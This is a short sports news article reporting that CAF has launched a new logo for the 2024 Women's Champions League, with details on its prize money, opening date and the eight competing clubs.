CAF unveils new logo ahead of 2024 Women’s Champions League

Ahead of next weekend’s CAF Women’s Champions League, the Confederation of African Football (CAF) has given the tournament a new identity.

A new logo for the competition was launched on Wednesday.

The vibrant, trophy-inspired logo symbolizes the tenacity and excellence of African women’s clubs, using the bold colors of CAF Women’s Football visual identity like purple, orange, and pink to represent royalty, innovation, and youthful energy across the continent.

CAF’s new logo is a beacon of pride and an invitation to fans, sponsors, and federations to champion women’s football, promising a vibrant and inclusive future for African women in sport.

The fourth edition of the CAF Women’s Champions League offers a substantial prize, with the winners receiving USD 400,000, and runners-up securing USD 250,000, underscoring CAF’s support for women’s clubs and investment in the sport.

The opening match will be played on Saturday, 09 November.

Eight teams are set to compete in this prestigious tournament including five debutants; Edo Queens (Nigeria), Aigles de la Medina (Senegal), University of Western Cape (South Africa), Commerical Bank of Ethiopia, and FC Masar (Egypt).

Former champions, Mamelodi Sundowns Ladies (South Africa) which won the title in 2021 and 2023 as well as host and 2022 winners, AS FAR FC (Morocco) are favourites for the title.

TP Mazembe from the Democratic Republic of Congo is making their second appearance at the tournament.
